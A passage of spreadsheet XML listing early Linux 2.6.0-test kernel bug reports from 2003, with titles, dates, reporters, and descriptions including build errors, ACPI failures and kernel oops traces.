  </si>
  <si>
    <t>2003-08-18 08:56 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 8.2 Hardware Environment: HP Pavilion ZE1115 Software Environment: V2.6.0-test3, gcc 3.3, cardmgr V3.2.4 Problem Description: This bug concerns module aha152x_cs, a driver for PCMCIA SCSI cards in V2.6.0- test3. My card is an Adaptec APA-1460, which works under the external PCMCIA subsystem with V2.4.20, and under the internal version with V2.4.21. When the card is plugged in, there is a kernel oops with the message "Unable to handle kernel NULL pointer dereference at virtual address 0". From the stack dump and test printk statements, I discovered that the oops occurs during the call to 'list_add_tail' from routine 'scsi_register'. The problem is that the list_heads 'next' and 'prv' in sht-&gt;legacy_hosts both contain NULL. I interpret this to mean that the structure 'aha152x_driver_template' has never been initialized. When I place the statement 'INIT_LIST_HEAD(&amp;sht-&gt;legacy_hosts)' before the call to 'list_add_tail', the driver loads, but the system freezes when I scan that scsi bus using a 'cdrecord -scanbus' statement. (My SCSI device is an external CD-RW drive). Because I lose control at this point, I have no idea what steps to take from here. I welcome any advice regarding further debugging. Steps to reproduce:</t>
  </si>
  <si>
    <t>Felipe Alfaro Solana</t>
  </si>
  <si>
    <t>Device class '3c59x' does not have a release() function, it is broken and must be fixed</t>
  </si>
  <si>
    <t>2.6.0-test3-mm3</t>
  </si>
  <si>
    <t>2003-08-19 04:27 UTC</t>
  </si>
  <si>
    <t>2003-10-27 01:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat Linux 9.0.93 Hardware Environment: NEC Chrom@ laptop Intel 440BX chipset Pentium III 700 Mhz Texas Instruments PCI4450 PC card Cardbus Controller 3Com Corporation 3CCFE575CT Cyclone CardBus (rev 10) Software Environment: Red Hat Linux 9.0.93 Problem Description: When unloading the 3c59x module by running "rmmod 3c59x", I get some kernel oopses complaining that the 3c59x device driver does not have a release() function. I have attached the output of "lspci -vvv" of the running kernel, plus the output of the "dmesg" command and the "config" used to build the kernel. Steps to reproduce: Try unloading the 3c59x module by running "rmmod 3c59x" and the mentioned kernel oops will happen.</t>
  </si>
  <si>
    <t>CONFIG_ACPI_RELAXED_AML is in 2.4 but not 2.6</t>
  </si>
  <si>
    <t>2003-08-20 20:19 UTC</t>
  </si>
  <si>
    <t>2006-09-28 13:21 UTC</t>
  </si>
  <si>
    <t>This options allows emulation of bugs in Microsoft's AML interpreter, which tolerate coding errors not caught by Microsoft's AML compiler. A slippery slope indeed, but it is easier than getting the OEM's to fix their BIOS.</t>
  </si>
  <si>
    <t>GRE tunnels freeze kernel</t>
  </si>
  <si>
    <t>2.6.0-test2, 2.6.0-test3</t>
  </si>
  <si>
    <t>2003-08-21 06:22 UTC</t>
  </si>
  <si>
    <t>Michal Ludvig</t>
  </si>
  <si>
    <t>2003-11-26 21:38 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE Linux 8.2 Hardware Environment: x86 Software Environment: gcc-3.3 used to compile kernel. Problem Description: Incoming packet to the GRE tunnel interface freezes the kernel. Steps to reproduce: On a 2.6.0-test system create a tunnel for instance with these steps: On 10.0.0.1: modprobe ip_gre ip tunnel add gre1 mode gre local 10.0.0.1 remote 10.0.0.2 ttl 64 ip link set gre1 up ip addr add 172.16.0.1/24 dev gre1 On a non-2.6.0 10.0.0.2: modprobe ip_gre ip tunnel add gre1 mode gre local 10.0.0.2 remote 10.0.0.1 ttl 64 ip link set gre1 up ip addr add 172.16.0.2/24 dev gre1 Now ping the 2.6.0 system: ping -c1 172.16.0.1 Upon receiving the packet the box foreezes. No Oops but neither &lt;Alt&gt;+&lt;F&gt; console switching nor NumLock worked anymore. (Don't know about SysRq).</t>
  </si>
  <si>
    <t>Unable to compile without "Software Suspend"</t>
  </si>
  <si>
    <t>2.6.0-test3-bk9</t>
  </si>
  <si>
    <t>2003-08-22 04:13 UTC</t>
  </si>
  <si>
    <t>2003-08-23 08:27 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: AMD64 Software Environment: gcc-3.3 Problem Description: It's impossible to compile kernel without "Software Suspend" on AMD64. At the linking time it complains: GEN .version CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 arch/x86_64/kernel/built-in.o(.text+0xc6bf): In function `do_suspend_lowlevel': : undefined reference to `save_processor_state' arch/x86_64/kernel/built-in.o(.text+0xc6c6): In function `do_suspend_lowlevel': : undefined reference to `saved_context_esp' arch/x86_64/kernel/built-in.o(.text+0xc6cd): In function `do_suspend_lowlevel': : undefined reference to `saved_context_eax' Steps to reproduce: On AMD64 deselect "Power management options" -&gt; "Software Suspend" and compile.</t>
  </si>
  <si>
    <t>2003-08-23 23:10 UTC</t>
  </si>
  <si>
    <t>Nick Piggin</t>
  </si>
  <si>
    <t>2006-09-28 13:19 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Problem Description: The following ACPI errors on boot. System boots fine and I have not noticed any regressions or loss of functionality. ACPI does not detect power button events though. ACPI: Subsystem revision 20030714 IOAPIC[0]: Set PCI routing entry (2-20 -&gt; 0xa9 -&gt; IRQ 20 Mode:1 Active:1) ACPI-1121: *** Error: Method execution failed [\_SB_.PCI0.SBRG.PS2M._STA] (Node d7eeace0), AE_AML_REGION_LIMIT ACPI-0098: *** Error: Method execution failed [\_SB_.PCI0.SBRG.PS2M._STA] (Node d7eeace0), AE_AML_REGION_LIMIT ACPI: Interpreter enabled ACPI: Using IOAPIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (00:00) PCI: Probing PCI hardware (bus 00) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI-1121: *** Error: Method execution failed [\_SB_.PCI0.SBRG.PS2M._STA] (Node d7eeace0), AE_AML_REGION_LIMIT and irq 20: nobody cared! Call Trace: [&lt;c010b7ba&gt;] __report_bad_irq+0x2a/0x90 [&lt;c010b8b0&gt;] note_interrupt+0x70/0xb0 [&lt;c010bb41&gt;] do_IRQ+0x111/0x120 [&lt;c0106ff0&gt;] default_idle+0x0/0x50 [&lt;c0109d7c&gt;] common_interrupt+0x18/0x20 [&lt;c0106ff0&gt;] default_idle+0x0/0x50 [&lt;c010701c&gt;] default_idle+0x2c/0x50 [&lt;c01070c9&gt;] cpu_idle+0x49/0x60 [&lt;c0105000&gt;] _stext+0x0/0x50 [&lt;c035e89b&gt;] start_kernel+0x15b/0x160 [&lt;c035e4b0&gt;] unknown_bootoption+0x0/0x120 handlers: [&lt;c01f3f4b&gt;] (acpi_irq+0x0/0x16) Disabling IRQ #20</t>
  </si>
  <si>
    <t>Platform</t>
  </si>
  <si>
    <t>2010-10-08 18:16 UTC</t>
  </si>
  <si>
    <t>IRQ sound issues on 1998 Asus P5AB -- PIC mode</t>
  </si>
  <si>
    <t>2003-08-24 05:40 UTC</t>
  </si>
  <si>
    <t>2004-04-12 21:24 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing/unstable Problem Description: 2.6.0-test4 now has a function to act like pci=noacpi, used in K7V. My ASUS P5AB also needs pci=noacpi, so it would be a good idea to add it to the blacklist (I know the BIOS is old, but finding out you need pci=noacpi to make ISA devices work on it with acpi=force is hard, and it works fine with acpi=force (I didn't test suspending yet)). I will attach the output of dmidecode so you can find the right values to add.</t>
  </si>
  <si>
    <t>acpi_poweroff fails to power down SMP machine</t>
  </si>
  <si>
    <t>2003-08-24 13:30 UTC</t>
  </si>
  <si>
    <t>Ronald Moesbergen</t>
  </si>
  <si>
    <t>2004-10-27 12:03 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Asus P4GX8 bios 1006 (latest), E7205 chipset, Intel P4 3.06HT Problem Description: When i try to shutdown my machine i get the following message: acpi_poweroff called and then nothing happens. When i enable acpi debug statements an extra line is displayed saying something like 'entering state S5' and again nothing happens. About one in 5 times the machine actually powers down, but it's rare. It has done this on every 2.5.x and 2.6.x kernel i've tried (from 2.5.70 up to test4) When i use apm the machine does shut down properly. config and lspci -vvv are attached.</t>
  </si>
  <si>
    <t>Config-Hotplug</t>
  </si>
  <si>
    <t>Sony Cli</t>
  </si>
  <si>
    <t>Arnaud Boudou</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: i386 Sony Cli</t>
  </si>
  <si>
    <t>2.6.0 Test Kernel Fails to Build</t>
  </si>
  <si>
    <t>2003-08-26 10:26 UTC</t>
  </si>
  <si>
    <t>Evan Klinger</t>
  </si>
  <si>
    <t>2003-08-26 10:40 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat Enterprise AS Tyroon Beta Hardware Environment: Dual AMD Opteron 64-bit Software Environment: standard Problem Description: Kernel fails to build Steps to reproduce: Configure kernel and compile. The error is below: arch/x86_64/kernel/built-in.o(.text+0xcd7f): In function `do_suspend_lowlevel': : undefined reference to `save_processor_state' arch/x86_64/kernel/built-in.o(.text+0xcd86): In function `do_suspend_lowlevel': : undefined reference to `saved_context_esp' arch/x86_64/kernel/built-in.o(.text+0xcd8d): In function `do_suspend_lowlevel': : undefined reference to `saved_context_eax' arch/x86_64/kernel/built-in.o(.text+0xcd94): In function `do_suspend_lowlevel': : undefined reference to `saved_context_ebx' arch/x86_64/kernel/built-in.o(.text+0xcd9b): In function `do_suspend_lowlevel': : undefined reference to `saved_context_ecx' arch/x86_64/kernel/built-in.o(.text+0xcda2): In function `do_suspend_lowlevel': : undefined reference to `saved_context_edx' arch/x86_64/kernel/built-in.o(.text+0xcda9): In function `do_suspend_lowlevel': : undefined reference to `saved_context_ebp' arch/x86_64/kernel/built-in.o(.text+0xcdb0): In function `do_suspend_lowlevel': : undefined reference to `saved_context_esi' arch/x86_64/kernel/built-in.o(.text+0xcdb7): In function `do_suspend_lowlevel': : undefined reference to `saved_context_edi' arch/x86_64/kernel/built-in.o(.text+0xcdbe): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r08' arch/x86_64/kernel/built-in.o(.text+0xcdc5): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r09' arch/x86_64/kernel/built-in.o(.text+0xcdcc): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r10' arch/x86_64/kernel/built-in.o(.text+0xcdd3): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r11' arch/x86_64/kernel/built-in.o(.text+0xcdda): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r12' arch/x86_64/kernel/built-in.o(.text+0xcde1): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r13' arch/x86_64/kernel/built-in.o(.text+0xcde8): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r14' arch/x86_64/kernel/built-in.o(.text+0xcdef): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r15' arch/x86_64/kernel/built-in.o(.text+0xcdf6): In function `do_suspend_lowlevel': : undefined reference to `saved_context_eflags' arch/x86_64/kernel/built-in.o(.text+0xce4a): In function `do_suspend_lowlevel': : undefined reference to `saved_context' arch/x86_64/kernel/built-in.o(.text+0xce54): In function `do_suspend_lowlevel': : undefined reference to `saved_context' arch/x86_64/kernel/built-in.o(.text+0xce5e): In function `do_suspend_lowlevel': : undefined reference to `saved_context' arch/x86_64/kernel/built-in.o(.text+0xce68): In function `do_suspend_lowlevel': : undefined reference to `saved_context' arch/x86_64/kernel/built-in.o(.text+0xce71): In function `do_suspend_lowlevel': : undefined reference to `saved_context_eflags' arch/x86_64/kernel/built-in.o(.text+0xce79): In function `do_suspend_lowlevel': : undefined reference to `saved_context_esp' arch/x86_64/kernel/built-in.o(.text+0xce80): In function `do_suspend_lowlevel': : undefined reference to `saved_context_ebp' arch/x86_64/kernel/built-in.o(.text+0xce87): In function `do_suspend_lowlevel': : undefined reference to `saved_context_eax' arch/x86_64/kernel/built-in.o(.text+0xce8e): In function `do_suspend_lowlevel': : undefined reference to `saved_context_ebx' arch/x86_64/kernel/built-in.o(.text+0xce95): In function `do_suspend_lowlevel': : undefined reference to `saved_context_ecx' arch/x86_64/kernel/built-in.o(.text+0xce9c): In function `do_suspend_lowlevel': : undefined reference to `saved_context_edx' arch/x86_64/kernel/built-in.o(.text+0xcea3): In function `do_suspend_lowlevel': : undefined reference to `saved_context_esi' arch/x86_64/kernel/built-in.o(.text+0xceaa): In function `do_suspend_lowlevel': : undefined reference to `saved_context_edi' arch/x86_64/kernel/built-in.o(.text+0xceb1): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r08' arch/x86_64/kernel/built-in.o(.text+0xceb8): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r09' arch/x86_64/kernel/built-in.o(.text+0xcebf): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r10' arch/x86_64/kernel/built-in.o(.text+0xcec6): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r11' arch/x86_64/kernel/built-in.o(.text+0xcecd): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r12' arch/x86_64/kernel/built-in.o(.text+0xced4): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r13' arch/x86_64/kernel/built-in.o(.text+0xcedb): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r14' arch/x86_64/kernel/built-in.o(.text+0xcee2): In function `do_suspend_lowlevel': : undefined reference to `saved_context_r15' arch/x86_64/kernel/built-in.o(.text+0xceed): In function `do_suspend_lowlevel': : undefined reference to `restore_processor_state' make: *** [.tmp_vmlinux1] Error 1</t>
  </si>
  <si>
    <t>FRLinux</t>
  </si>
  <si>
    <t>8139too : Too much work at interrupt</t>
  </si>
  <si>
    <t>2.6.0-test4 (all of -bk2 -mm2 and RedHat's ...1.32.)</t>
  </si>
  <si>
    <t>2003-08-27 11:31 UTC</t>
  </si>
  <si>
    <t>John Ellson</t>
  </si>
  <si>
    <t>2003-12-18 13:32 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat Hardware Environment: Sony Vaio + D-Link System Inc DFE-690TXD CardBus PC Card Software Environment: Problem Description: 8139too module default parameters result in frequent log message: "Aug 27 08:42:21 beermat kernel: eth0: Too much work at interrupt, IntrStatus=0x0040." Data rate reduced to about 50KBytes/sec when it should be about 5MBytes/sec for local lan traffic. Steps to reproduce: boot with DFE-690TXD, ifup eth0 (needed because of other problems) try to transfer files Work around: Adding "options 8139too max_interrupt_work=80" to /etc/modprobe.conf seems to solve the problem. Perhaps this should be the default?</t>
  </si>
  <si>
    <t>Matrox Framebuffer does not compile</t>
  </si>
  <si>
    <t>2.6.0-test4 +</t>
  </si>
  <si>
    <t>2003-08-28 02:35 UTC</t>
  </si>
  <si>
    <t>Richard Wale</t>
  </si>
  <si>
    <t>2003-11-11 02:59 UTC</t>
  </si>
  <si>
    <t>Distribution: http://source.mvista.com:14690//linuxppc-2.5 Hardware Environment: RS/6000 F50 (7025) Software Environment: Debian Unstable Problem Description: Kernel compile fails on Matrox framebuffer. CC drivers/video/console/dummycon.o CC drivers/video/console/vgacon.o LD drivers/video/console/built-in.o CC drivers/video/matrox/matroxfb_base.o In file included from drivers/video/matrox/matroxfb_base.c:106: drivers/video/matrox/matroxfb_base.h:58:28: video/macmodes.h: No such file or directory drivers/video/matrox/matroxfb_base.c:120: error: `VMODE_NVRAM' undeclared here (not in a function) drivers/video/matrox/matroxfb_base.c:121: error: `CMODE_NVRAM' undeclared here (not in a function) drivers/video/matrox/matroxfb_base.c: In function `initMatrox2': drivers/video/matrox/matroxfb_base.c:1791: error: `VMODE_MAX' undeclared (first use in this function) drivers/video/matrox/matroxfb_base.c:1791: error: (Each undeclared identifier is reported only once drivers/video/matrox/matroxfb_base.c:1791: error: for each function it appears in.) drivers/video/matrox/matroxfb_base.c:1792: error: `VMODE_640_480_60' undeclared (first use in this function) drivers/video/matrox/matroxfb_base.c:1794: error: `CMODE_NVRAM' undeclared (first use in this function) drivers/video/matrox/matroxfb_base.c:1795: error: `NV_CMODE' undeclared (first use in this function) drivers/video/matrox/matroxfb_base.c:1797: error: `CMODE_8' undeclared (first use in this function) drivers/video/matrox/matroxfb_base.c:1797: error: `CMODE_32' undeclared (first use in this function) drivers/video/matrox/matroxfb_base.c:1799: warning: implicit declaration of function `mac_vmode_to_var' drivers/video/matrox/matroxfb_base.c: In function `matroxfb_setup': drivers/video/matrox/matroxfb_base.c:2298: error: `VMODE_MAX' undeclared (first use in this function) drivers/video/matrox/matroxfb_base.c:2305: error: `CMODE_8' undeclared (first use in this function) drivers/video/matrox/matroxfb_base.c:2309: error: `CMODE_16' undeclared (first use in this function) drivers/video/matrox/matroxfb_base.c:2313: error: `CMODE_32' undeclared (first use in this function) make[3]: *** [drivers/video/matrox/matroxfb_base.o] Error 1 make[2]: *** [drivers/video/matrox] Error 2 make[1]: *** [drivers/video] Error 2 make: *** [drivers] Error 2 Steps to reproduce: CONFIG_FB=y CONFIG_FB_OF=y CONFIG_FB_MATROX=y CONFIG_FB_MATROX_MYSTIQUE=y I've been trying to get a 2.5.x/2.6 kernel to compile since the late 2.5.6x releases with no luck. I found Bug209, which I thought was related, but it seems not as that was resolved. The system's currently running 2.4.21. I can provide my full .config if required. Apologies if this is something obvious I've done wrong. Please advise, Cheers Rich.</t>
  </si>
  <si>
    <t>Oops at boottime with ACPI enabled - VIA694</t>
  </si>
  <si>
    <t>BIOS</t>
  </si>
  <si>
    <t>2003-08-28 16:51 UTC</t>
  </si>
  <si>
    <t>2004-03-05 10:04 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Woody Hardware Environment: Rioworks SDVIA Dual P3 motherboard Software Environment: Problem Description: Oops at boot-time with ACPI-enabled Steps to reproduce: If I boot with ACPI enabled, I get an oops right after "ACPI: Subsystem 20030813". I have written down the oops for hand (only way, have no serial console and the computer locks up). I will also attach the output from dmidecode and acpidmp. I don't doubt for a second that my DSDT is all screwed up, but it shouldn't oops, should it?</t>
  </si>
  <si>
    <t>2.4.22 IO-APIC ACPI SCI but no eth0 interrupts</t>
  </si>
  <si>
    <t>2003-08-28 18:57 UTC</t>
  </si>
  <si>
    <t>2004-03-03 22:07 UTC</t>
  </si>
  <si>
    <t>unplugging and then unmounting a USB DoK causes oops in kobj_get_path_length</t>
  </si>
  <si>
    <t>2003-08-29 07:53 UTC</t>
  </si>
  <si>
    <t>Here's the oops, from /var/log/messages. Steps to reproduce: 1. plugging in the USB device 2. mounting it 3. unplugging 4. unmounting (note the order: unplug happens before unmount). Aviram, what kind of USB Disk on Key is it? Aug 29 15:53:07 beyondmobile1 kernel: Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0 Aug 29 15:53:09 beyondmobile1 kernel: Attached scsi generic sg0 at scsi0, channe l 0, id 0, lun 0, type 0 Aug 29 15:53:14 beyondmobile1 kernel: st: Version 20030811, fixed bufsize 32768, s/g segs 256 Aug 29 15:53:17 beyondmobile1 kernel: osst :I: Tape driver with OnStream support version 0.99.0 Aug 29 15:53:17 beyondmobile1 kernel: osst :I: $Id: osst.c,v 1.68 2002/12/23 16: 33:36 riede Exp $ Aug 29 15:53:30 beyondmobile1 kernel: hub 1-0:0: debounce: port 1: delay 100ms s table 4 status 0x101 Aug 29 15:53:30 beyondmobile1 kernel: hub 1-0:0: new USB device on port 1, assig ned address 2 Aug 29 15:53:30 beyondmobile1 kernel: scsi1 : SCSI emulation for USB Mass Storag e devices Aug 29 15:53:30 beyondmobile1 kernel: Vendor: SigmaTel Model: MSCN Rev: 0001 ug 29 15:53:30 beyondmobile1 kernel: Type: Direct-Access ANSI SCSI revision: 02 Aug 29 15:53:30 beyondmobile1 kernel: SCSI device sdb: 256001 512-byte hdwr sectors (131 MB) Aug 29 15:53:30 beyondmobile1 kernel: sdb: Write Protect is off Aug 29 15:53:30 beyondmobile1 kernel: SCSI device sdb: drive cache: write through Aug 29 15:53:30 beyondmobile1 kernel: sdb: sdb1 Aug 29 15:53:30 beyondmobile1 kernel: Attached scsi removable disk sdb at scsi1, channel 0, id 0, lun 0 Aug 29 15:53:30 beyondmobile1 kernel: Attached scsi generic sg1 at scsi1, channel 0, id 0, lun 0, type 0 Aug 29 15:54:14 beyondmobile1 kernel: usb 1-1: USB disconnect, address 2 Aug 29 15:54:19 beyondmobile1 kernel: printing eip: Aug 29 15:54:19 beyondmobile1 kernel: c0259206 Aug 29 15:54:19 beyondmobile1 kernel: Oops: 0000 [#1] Aug 29 15:54:19 beyondmobile1 kernel: CPU: 0 Aug 29 15:54:19 beyondmobile1 kernel: EIP: 0060:[get_kobj_path_length+38/64] Not tainted Aug 29 15:54:19 beyondmobile1 kernel: EFLAGS: 00210206 Aug 29 15:54:19 beyondmobile1 kernel: EIP is at get_kobj_path_length+0x26/0x40 Aug 29 15:54:19 beyondmobile1 kernel: eax: 00000000 ebx: 00000000 ecx: ffffffff edx: 2e302e33 Aug 29 15:54:19 beyondmobile1 kernel: esi: 0000004a edi: 2e302e33 ebp: ffffffff esp: c4a07e5c Aug 29 15:54:19 beyondmobile1 kernel: ds: 007b es: 007b ss: 0068 Aug 29 15:54:19 beyondmobile1 kernel: Process umount (pid: 788, threadinfo=c4a06000 task=cdb98d40) Aug 29 15:54:19 beyondmobile1 kernel: Stack: 00000089 cb548c19 cb548c00 cf09c1a0 c02593d8 c0497180 c93151a4 00000089 Aug 29 15:54:19 beyondmobile1 kernel: c4969480 c4969480 c9315180 cb548c00 00000000 c0456f80 c041a2d8 00000000 Aug 29 15:54:19 beyondmobile1 kernel: c02dc916 c93151a4 ce5230a0 c9315000 c049af88 c025982a c0414ee5 c0497180 Aug 29 15:54:19 beyondmobile1 kernel: Call Trace: Aug 29 15:54:19 beyondmobile1 kernel: [kset_hotplug+344/672] kset_hotplug+0x158/0x2a0 Aug 29 15:54:19 beyondmobile1 kernel: [device_release_driver+102/112] device_release_driver+0x66/0x70 Aug 29 15:54:19 beyondmobile1 kernel: [kobject_del+106/112] kobject_del+0x6a/0x70 Aug 29 15:54:19 beyondmobile1 kernel: [device_del+112/160] device_del+0x70/0xa0 Aug 29 15:54:19 beyondmobile1 kernel: [scsi_device_put+174/208] scsi_device_put+0xae/0xd0 Aug 29 15:54:19 beyondmobile1 kernel: [_end+274622846/1068201304] sd_release+0x36/0x60 [sd_mod] Aug 29 15:54:19 beyondmobile1 kernel: [blkdev_put+400/448] blkdev_put+0x190/0x1c0 Aug 29 15:54:19 beyondmobile1 kernel: [blkdev_put+333/448] blkdev_put+0x14d/0x1c0 Aug 29 15:54:19 beyondmobile1 kernel: [kill_block_super+60/80] kill_block_super+0x3c/0x50 Aug 29 15:54:19 beyondmobile1 kernel: [deactivate_super+94/192] deactivate_super+0x5e/0xc0 Aug 29 15:54:19 beyondmobile1 kernel: [sys_umount+63/160] sys_umount+0x3f/0xa0 Aug 29 15:54:19 beyondmobile1 kernel: [sys_oldumount+23/32] sys_oldumount+0x17/0x20 Aug 29 15:54:19 beyondmobile1 kernel: [syscall_call+7/11] syscall_call+0x7/0xb Aug 29 15:54:19 beyondmobile1 kernel: Aug 29 15:54:19 beyondmobile1 kernel: Code: f2 ae f7 d1 49 8b 52 20 8d 74 31 01 85 d2 75 ea 5b 89 f0 5e Aug 29 15:54:39 beyondmobile1 kernel: spurious 8259A interrupt: IRQ7.</t>
  </si>
  <si>
    <t>module cosa (wan driver) does noet compile</t>
  </si>
  <si>
    <t>2003-08-29 11:43 UTC</t>
  </si>
  <si>
    <t>2008-09-25 12:01 UTC</t>
  </si>
  <si>
    <t>Dan Carpenter</t>
  </si>
  <si>
    <t>Distribution: Mandrake 9.1 Hardware Environment: AMD Athlon 750, 320 Mb. Software Environment: gcc 3.2 Problem Description: module cosa does not compile Steps to reproduce: compile kernel with cosa selected</t>
  </si>
  <si>
    <t>APCI boot changes BIOS CMOS on Dell PE400SC</t>
  </si>
  <si>
    <t>2.6-test4</t>
  </si>
  <si>
    <t>2003-09-01 17:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Dell PE400SC, same motherboard as Dimension 8000 Software Environment: Kernel 2.6-test4 Problem Description: Everytime I reboot with full ACPI the BIOS option "OS Install Mode" turns on. "OS Install Mode" limits memory to 256MB for NT compatibility. The machine has 1GB memory. I tried APCI HT enum only too. In this case shutdown does not poweroff the machine. Poweroff works with full ACP. Steps to reproduce: Turn on full ACPI under 2.6-test4, reboot on a Dell PE400SC.</t>
  </si>
  <si>
    <t>3c509.c Etherlink III module doesn't compile when CONFIG_MCA defined</t>
  </si>
  <si>
    <t>2003-09-01 18:44 UTC</t>
  </si>
  <si>
    <t>Etienne Dube</t>
  </si>
  <si>
    <t>2003-12-17 18:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4 Hardware Environment: IBM PS/2 model 77 (486, MCA bus, scavenged from a dumpster) Software Environment: built a kernel for experimenting on that old box; gcc 3.3 Problem Description: When CONFIG_MCA is defined, in file drivers/net/3c509.c, line 632: strncpy(device-&gt;name, el3_mca_adapter_names[mdev-&gt;index], sizeof(device-&gt;name)); ...member 'name' of structure 'device' doesn't exist (from include/linux/device.h) I replaced the code with the following: strncpy(device-&gt;driver-&gt;name, el3_mca_adapter_names[mdev-&gt;index], sizeof(device-&gt;driver-&gt;name)); It allows the module to compile; as I don't have a 3c509 MCA card, I did not test the fix... and I'm no master in the arcane art of kernel development, so don't blame me if it doesn't make any sense :) . Steps to reproduce: 1. Get your favorite vanilla 2.6.0-test4 kernel 2. Configure, enabling 3c509 module and support for MCA bus 3. Make 4. Enjoy: drivers/net/3c509.c: In function `el3_mca_probe': drivers/net/3c509.c:632: error: structure has no member named `name' drivers/net/3c509.c:633: error: structure has no member named `name' make[2]: *** [drivers/net/3c509.o] Error 1 make[1]: *** [drivers/net] Error 2 make: *** [drivers] Error 2 Etienne Dube Computer engineering student, Ecole Polytechnique de Montreal</t>
  </si>
  <si>
    <t>print_IO_APIC() is too early in ACPI mode</t>
  </si>
  <si>
    <t>2003-09-03 03:02 UTC</t>
  </si>
  <si>
    <t>2004-03-04 11:48 UTC</t>
  </si>
  <si>
    <t>setup_IO_APIC() doesn't know that ACPI is (later) programming the IO-APICs, so it calls print_IO_APIC() and dumps the hardware state before the hardware is programmed. This output is at best useless, and at worst confusing. If this output is to appear when booting with ACPI, it should occur once -- after ACPI has programmed the APICs.</t>
  </si>
  <si>
    <t>2.6.0-test4-bk6 - undefined reference to `calibrate_tsc'</t>
  </si>
  <si>
    <t>2.6.0-test4-bk6</t>
  </si>
  <si>
    <t>2003-09-04 13:57 UTC</t>
  </si>
  <si>
    <t>2003-10-24 05:32 UTC</t>
  </si>
  <si>
    <t>Distribution: RH8 Hardware Environment: summit Software Environment: gcc-3.2 Problem Description: building, I get the following error: CHK include/linux/compile.h CC kernel/configs.o LD kernel/built-in.o GEN .version CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 arch/i386/kernel/built-in.o: In function `probe_irq_mask': /home/plars/kernels/linux-2.6.0-test4/arch/i386/kernel/irq.c:771: undefined reference to `calibrate_tsc' make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: build the kernel</t>
  </si>
  <si>
    <t>Broken FAN detection prevents booting</t>
  </si>
  <si>
    <t>Power-Fan</t>
  </si>
  <si>
    <t>2003-09-04 16:11 UTC</t>
  </si>
  <si>
    <t>Martin Mokrejs</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: ASUS L3800C, BIOS 1.21 Software Environment: Problem Description: The machine starts to boot. I know that at the place ACPI prints out the status of CPU, BATTERY, FAN etc. it prints some long message on a line, but it immediately scrolls away. The machine if I remember well locks somewhere after init. &gt; From: Martin Mokrejs [mailto:mmokrejs@natur.cuni.cz] &gt; Sent: Thursday, August 21, 2003 12:15 PM &gt; To: linux-kernel@vger.kernel.org &gt; Subject: ACPI kernel crash with 2.4.22-pre7 on ASUS L3800C &gt; &gt; &gt; Hi, &gt; I observe time to time on cold boot hang of my laptop. I &gt; remember to see &gt; such hangs at least since 2.4.21-pre3. Here's my latest &gt; running kernel: &gt; &gt; # ksymoops --system-map=/boot/System.map-2.4.22-pre7 &gt; --vmlinux=/usr/src/linux-2.4.22-pre7/vmlinux ./cr &gt; ksymoops 2.4.9 on i686 2.4.22-pre7. Options used &gt; -v /usr/src/linux-2.4.22-pre7/vmlinux (specified) &gt; -k /proc/ksyms (default) &gt; -l /proc/modules (default) &gt; -o /lib/modules/2.4.22-pre7/ (default) &gt; -m /boot/System.map-2.4.22-pre7 (specified) &gt; &gt; EFLAGS: 00010246 &gt; eax: 00000000 ebx: 638a05f0 ecx: 00000000 edx: 00000006 &gt; esi: 638a05f0 edi: f7ebddd0 ebp: f7ebdd78 esp: f7ebdd74 &gt; ds: 0018 es: 0018 ss: 0018 &gt; Process keventd: (pid 2, stackpage=f7ebd000) &gt; Stack: f7ebdda4 f7ebdd90 c01ede68 638a05f0 f7ebdda4 f7ebddd0 &gt; 638a05f0 f7ebddc0 &gt; c01fc0f2 638a05f0 c01fc072 f7ebddd0 00010000 c0337755 &gt; c033770a 00000050 &gt; f7ebddd4 f7ebddd4 638a05f0 f7ebddf0 c02037c2 638a05f0 &gt; f7ebddd0 00000000 &gt; Call Trace: [&lt;c01ede68&gt;] [&lt;c01fc0f2&gt;] [&lt;c01fc072&gt;] &gt; [&lt;c02037c2&gt;] [&lt;c01f8a2a&gt;] &gt; [&lt;c0203b8d&gt;] [&lt;c0203ee7&gt;] [&lt;c01fc4c7&gt;] [&lt;c01f8a00&gt;] &gt; [&lt;c0207aed&gt;] [&lt;c0207e5e&gt;] &gt; [&lt;c0208b60&gt;] [&lt;c01dce5a&gt;] [&lt;c01d4f7d&gt;] [&lt;c011ff0a&gt;] &gt; [&lt;c01282e5&gt;] [&lt;c01281b0&gt;] &gt; [&lt;c0105000&gt;] [&lt;c01057ee&gt;] [&lt;c01281b0&gt;] &gt; Code: 80 3b aa 0f 44 c3 5b 5d c3 a1 d4 55 40 c0 eb f6 55 89 